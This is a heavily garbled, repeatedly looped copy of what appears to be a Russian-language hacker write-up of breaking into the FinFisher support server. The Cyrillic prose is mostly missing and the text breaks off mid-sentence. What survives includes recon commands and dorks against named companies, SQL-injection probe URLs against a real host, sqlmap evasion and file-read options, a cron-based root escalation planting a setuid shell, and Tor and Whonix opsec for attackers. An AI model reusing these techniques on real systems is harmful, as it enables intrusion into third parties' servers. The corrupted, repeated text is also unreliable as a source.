
    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

